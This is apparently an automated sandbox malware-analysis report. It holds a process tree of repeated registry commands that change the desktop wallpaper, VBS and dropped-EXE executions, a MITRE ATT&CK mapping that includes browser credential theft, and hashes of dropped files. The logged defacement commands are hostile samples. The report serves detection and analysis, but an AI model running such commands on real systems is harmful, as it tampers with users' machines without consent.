        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6664
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6800
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6912
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7028
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:7048
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:7060
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6260
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1840
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6216
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6396
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6488
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6544
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6628
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6912
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6972
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:7032
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:7064
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:3520
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:4512
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6216
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:6444
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6620
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:5044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:6628
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6968
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7056
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4672
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2400
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:2652
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6196
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1140
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:6456
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1440
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:4892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6676
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:7056
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3104
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4832
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4224
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:2656
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:6216
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:6412
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1440
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:5044
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6656
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:2548
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:1956
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:3216
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:3036
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:1944
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:776
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:2572
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:3028
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:3208
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
    3⤵
    PID:1884
- - C:\Users\Admin\AppData\Local\Temp\melter.exe
    melter.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4188,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
1⤵
PID:4492

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x418 0x464
1⤵
PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
896KB

MD5
77ac7dbd2c295bb2ca42fb20b85bf269

SHA1
8ba917f31545b0d230688eb38d8a27f1926c2e34

SHA256
89f743828c896393415e07772af62acf9691343c73d3684909b8ade755fbf9d1

SHA512
a79af8f4c8fe84212941d455134c4130b9a148283567dfdead7d794bc3ab5ad8765ea180a857771b5ed26fd24883fbbaa316b3010022b2f0e79c559aaedde1b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
704KB

MD5
893a38fbb6d4135c488cbf6f7c79d240

SHA1
fe68a843b74ae6109f67c2d6d43b29758be6e023

SHA256
2d7ea8169cfc7ab3cd8afc8af5fa62881fb7e687fcaff001d3ff3459439307bb

SHA512
5a394831e27ceee8f53a2e96735f4b3f49a1f35b9a246f23c221bfc74ef21e4a45a8aa2bebc06ee007f28321ea37c0c8c753a70ea0e46a2320a2c19e8f7a97fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

Filesize
498B

MD5
90be2701c8112bebc6bd58a7de19846e

SHA1
a95be407036982392e2e684fb9ff6602ecad6f1e

SHA256
644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

SHA512
d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22fbec4acba323d04079a263526cef3c

SHA1
eb8dd0042c6a3f20087a7d2391eaf48121f98740

SHA256
020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40

SHA512
fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
994a0d9b5c448e02b6a9918b03447186

SHA1
e0e28e97672f139f6ff119ea0efa05936c1f351f

SHA256
25c23682c74bc0a095a28517707d8686e8fad715da790913cb78908c416e8284

SHA512
1b751b82b41f32aa619f80ae1d09516ab4463e565581d2f9f222752766bfc932b7d1d21971fbed8550180a049367d9bb9c1e8c16c47380ee15e097e5e755556c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e76b0bfbc116f9025082df79bf7d2196

SHA1
5b4705afc9c4867f21189b8d9dc6cf8cb7950289

SHA256
db1427bace75ef90d0b58f56aed1c49658b27d07647007dd8cfa68a79861382e

SHA512
c9fcb08ec71810ac93a70567958280715b826d6bbbaf38747df64e349b5f7eaf4d423d3ceff48b4087261b5e9df8091d357bb396a51cf11a27405e80d9f5008b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1230.vbs

Filesize
1KB

MD5
135594160762ab9dd80794d7b34ab32a

SHA1
638fef88bbb5d310c51eda07ca10918a482ad3ac

SHA256
531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0

SHA512
19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

Download Submit
C:\Users\Admin\AppData\Local\Temp\15233.vbs

Filesize
161B

MD5
9ef84482b2ee91778b16da55affb45b0

SHA1
7bac03c894cab7908f1d523e866cd4c194d6e2e7

SHA256
9e307f84b3771e98ddad1b62673b15696a6a70354a9a564fe6c67d8866579756

SHA512
42453e77727948aaecc5418a6063cf7ab1ca006de33d0970553d496aa56213d4b54b2a422daf8775d170a3d2d70f9e4d9c777ae3045476172bdcaaa81b1a3452

Download Submit
C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

Filesize
27B

MD5
597cf1068c84a5c01afd9472a7453116

SHA1
bc9a638c47aab57b04b2257f421a48b2ee682732

SHA256
0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799

SHA512
3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

Download Submit
C:\Users\Admin\AppData\Local\Temp\17222.bat

Filesize
461B

MD5
ab300e6fad94e089d29ee866c57a3a2c

SHA1
8e49ff28b4b0f1d1d2bdb981fc8d1e16ed8e4b84

SHA256
43c11c5f17b8dc6727e8df07cb6bb769cede1a130e53749d856c32c43535605f

SHA512
90a4c6ddb361a35d4515a6f54532cceaf70b82d17355b99fa6143e473ea9d79e1f9c6725b55966505b71f50d2c46f9614d382a73f878527f06ee29c480ae0d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\19765.vbs

Filesize
236B

MD5
3a7e0a94fa88dccd40d9b76b37d06db1

SHA1
d7604ddb660898ce3b1343aa712cf5926bc68bda

SHA256
368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4

SHA512
19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\20056.vbs

Filesize
179B

MD5
523092d53a06f5b46778a0cd7c01d0fb

SHA1
221a8244271afdbe7ce105aaf189f1dbcfa57cdb

SHA256
09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e

SHA512
72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2297.vbs

Filesize
390B

MD5
aabbe725da9751315bbeeda4ef58d816

SHA1
476c78912d61e790a793c8e6606825f2b169947c

SHA256
0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360

SHA512
0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\26761.vbs

Filesize
276B

MD5
8a9b451fd9936100f33b576bb5ec3f02

SHA1
80c92544f733ddfb96dffa296293fb2835e85f2e

SHA256
4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455

SHA512
b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\32120.vbs

Filesize
490B

MD5
93e179454db6fe9ac81112193de37cde

SHA1
4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9

SHA256
8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc

SHA512
a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

Download Submit
C:\Users\Admin\AppData\Local\Temp\6180.vbs

Filesize
106B

MD5
ec385d968eea8bf5abe4587305f39c89

SHA1
6509b0bb7cb6432a4c723f37dc7593116ad57c64

SHA256
98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96

SHA512
d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat

Filesize
8KB

MD5
074b0499fa7df4238b66cf7f0ab1ca64

SHA1
3ad09a2f3f51e5b4899397ec185672a6c0c4af18

SHA256
48fdcc988fd0f193c920c28ba7a8414497a4190278c8c077fda92a5349290b48

SHA512
496c6e1c462d40f5515ccf50b4ad7f14258782bc9329bad0c7776f4b22b66dd8790e181149604f87e816b865945dd4893c644b545aa84a4ed53ecfcabdca9686

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vm3ocmwb.ncs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\melter.exe

Filesize
3KB

MD5
d9baac374cc96e41c9f86c669e53f61c

SHA1
b0ba67bfac3d23e718b3bfdfe120e5446d0229e8

SHA256
a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412

SHA512
4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

Download Submit
C:\Users\Admin\AppData\Local\Temp\risitas.hta

Filesize
511B

MD5
af25ddf889ed3804a85b487a95993a94

SHA1
e22ce7ce7e6b18400913de410be90fa79c2b6edb

SHA256
bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab

SHA512
8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_27B7CC8EC38D4CCA834CF42C0CC93BF4.dat

Filesize
940B

MD5
98b6da4c5e844137802e2af066164ed0

SHA1
0daa9dda66b3e3ab34629e1614f610e312182c12

SHA256
17d07e79e9e6dd505aef614abc8c3123377e56db94892f29602966fee0fc111c

SHA512
b7fb00d6c19ce976adc54087765a96eb3f2d6f0d8475b8b3eca62c37e2ffd1c249ce44e601184cf8fcf6fc350f91a5e2ef48f1966008d444a413f826b14544c9

Download Submit
memory/4088-164-0x000001BBD42C0000-0x000001BBD42CA000-memory.dmp

Filesize
40KB

Download
memory/4088-129-0x000001BBD4330000-0x000001BBD43A6000-memory.dmp

Filesize
472KB

Download
memory/4088-184-0x00007FF8368F0000-0x00007FF8373B1000-memory.dmp

Filesize
10.8MB

Download
memory/4088-165-0x000001BBD42F0000-0x000001BBD4302000-memory.dmp

Filesize
72KB

Download
memory/4088-183-0x000001BBD4400000-0x000001BBD45A9000-memory.dmp

Filesize
1.7MB

Download
memory/4088-131-0x000001BBD4120000-0x000001BBD413E000-memory.dmp

Filesize
120KB

Download
memory/4088-4-0x00007FF8368F0000-0x00007FF8373B1000-memory.dmp

Filesize
10.8MB

Download
memory/4088-3-0x00007FF8368F3000-0x00007FF8368F5000-memory.dmp

Filesize
8KB

Download
memory/4088-2-0x000001BBB9BB0000-0x000001BBB9BF0000-memory.dmp

Filesize
256KB

Download
memory/4088-130-0x000001BBD43B0000-0x000001BBD4400000-memory.dmp

Filesize
320KB

Download
memory/4716-101-0x000002892C3A0000-0x000002892C3C2000-memory.dmp

Filesize
136KB

Download